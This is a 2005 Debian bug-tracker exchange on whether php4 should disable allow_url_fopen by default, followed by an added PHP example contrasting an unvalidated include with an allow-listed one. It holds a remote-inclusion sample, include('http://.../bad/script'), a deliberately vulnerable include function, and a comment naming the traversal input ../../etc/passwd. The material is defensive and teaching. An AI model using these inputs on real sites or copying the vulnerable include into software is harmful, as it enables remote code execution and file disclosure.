[php-maint] Bug#344952: marked as done (php4: allow_url_fopen = On by default is insecure and there are bots exploiting this)

Debian Bug Tracking System owner at bugs.debian.org
Wed Dec 28 04:48:05 UTC 2005


Your message dated Wed, 28 Dec 2005 14:32:40 +1000
with message-id <43B21568.4070507 at 0c3.net>
and subject line [php-maint] Bug#344952: php4: allow_url_fopen = On by default is insecure and there are bots exploiting this
has caused the attached Bug report to be marked as done.

This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.

(NB: If you are a system administrator and have no idea what I am
talking about this indicates a serious mail system misconfiguration
somewhere.  Please contact me immediately.)

Debian bug tracking system administrator
(administrator, Debian Bugs database)

--------------------------------------
From: Chris Niekel <chris at niekel.net>
To: Debian Bug Tracking System <submit at bugs.debian.org>
Subject: php4: allow_url_fopen = On by default is insecure and there are bots exploiting this
Message-ID: <20051227213049.2615.83727.reportbug at kira.niekel.net>
X-Mailer: reportbug 3.18
Date: Tue, 27 Dec 2005 22:30:49 +0100

Package: php4
Version: 4:4.4.0-4
Severity: normal

Hi,

The setting allow_url_fopen is On by default, like upstream php4. This allows
code like:
    include($p);
where $p is set in the url. This is being exploited by people to make you do
    include('http://.../bad/script');

Although this is mostly a problem by the php-user, setting this option to
'Off' by default seems a good security trade-off to me.  (And yes, my site
was running some strange code, fortunately as www-data).

Regards,
Chris Niekel

-- System Information:
Debian Release: testing/unstable
  APT prefers testing
  APT policy: (500, 'testing'), (500, 'stable'), (50, 'unstable')
Architecture: i386 (i686)
Shell:  /bin/sh linked to /bin/bash
Kernel: Linux 2.4.27-2-686
Locale: LANG=C, LC_CTYPE=C (charmap=ANSI_X3.4-1968)

Versions of packages php4 depends on:
ii  libapache-mod-php4            4:4.4.0-4  server-side, HTML-embedded scripti
ii  php4-cgi                      4:4.4.0-4  server-side, HTML-embedded scripti
ii  php4-common                   4:4.4.0-4  Common files for packages built fr

php4 recommends no packages.

-- debconf information:
  php4/run_apache_sslconfig: true
  php4/run_apacheconfig: true
  php4/update_apache_php_ini: true

---------------------------------------
Message-ID: <43B21568.4070507 at 0c3.net>
Date: Wed, 28 Dec 2005 14:32:40 +1000
From: Adam Conrad <adconrad at 0c3.net>
To: Chris Niekel <chris at niekel.net>,  344952-done at bugs.debian.org
Subject: Re: [php-maint] Bug#344952: php4: allow_url_fopen = On by default is insecure and there are bots exploiting this
References: <20051227213049.2615.83727.reportbug at kira.niekel.net>
In-Reply-To: <20051227213049.2615.83727.reportbug at kira.niekel.net>

Chris Niekel wrote:
> 
> The setting allow_url_fopen is On by default, like upstream php4. This allows
> code like:
>     include($p);
> where $p is set in the url. This is being exploited by people to make you do
>     include('http://.../bad/script');

If you are blindly including random files that users tell you to with no
input validation, you have more fundamental problems than whether or not
they can inject remote files.  I could rampage all over your filesystem
like that as well.

The bottom line, of course, is that allow_url_fopen is incredibly
convenient when used correctly, and I'd be willing to bet a lot of 3rd
party PHP apps in Debian rely on it in one way or another (I know I
certainly have in the past), and disabling random functionality in the
default PHP setup is no substitute for learning the basics of secure
programming.

Pretty please, with sugar on top, validate input given to you from
untrusted sources.

... Adam
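The include pattern both messages discuss, as an added example that is not part of the bug report or of Debian's php4 packaging: the unvalidated include beside an allow-listed version that removes the dependence on allow_url_fopen altogether. It targets PHP 7 or later; the page names and file paths are constructed for illustration.

```php
<?php
// Added example (not from the bug report): the include pattern Chris
// describes, next to the validated version Adam asks for.

// Vulnerable: $page comes straight from the query string. With
// allow_url_fopen=On the value can name a remote script; with it Off the
// value can still name any readable local file (../../etc/passwd), which
// is Adam's point: the missing validation is the real defect.
function render_page_vulnerable(string $page): void
{
    include($page);
}

// Hardened: treat the request parameter as an opaque key into a fixed map.
// Nothing the user sends is ever used as a path, so neither remote nor
// local inclusion is possible whatever allow_url_fopen is set to.
const PAGES = [   // constructed sample map; adapt to the application
    'home'    => __DIR__ . '/pages/home.php',
    'about'   => __DIR__ . '/pages/about.php',
    'contact' => __DIR__ . '/pages/contact.php',
];

// Returns the allow-listed file for a requested page, or null if the
// request does not match any known key exactly.
function resolve_page(?string $requested): ?string
{
    if ($requested === null) {
        return PAGES['home'];
    }
    return PAGES[$requested] ?? null;
}

function render_page_safe(?string $requested): void
{
    $file = resolve_page($requested);
    if ($file === null) {
        // Reject instead of falling through to the raw value.
        http_response_code(404);
        echo 'Unknown page';
        return;
    }
    include $file;
}

render_page_safe($_GET['p'] ?? null);
```

Because the map is the only source of paths, disabling allow_url_fopen becomes defence in depth rather than the control the application relies on.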
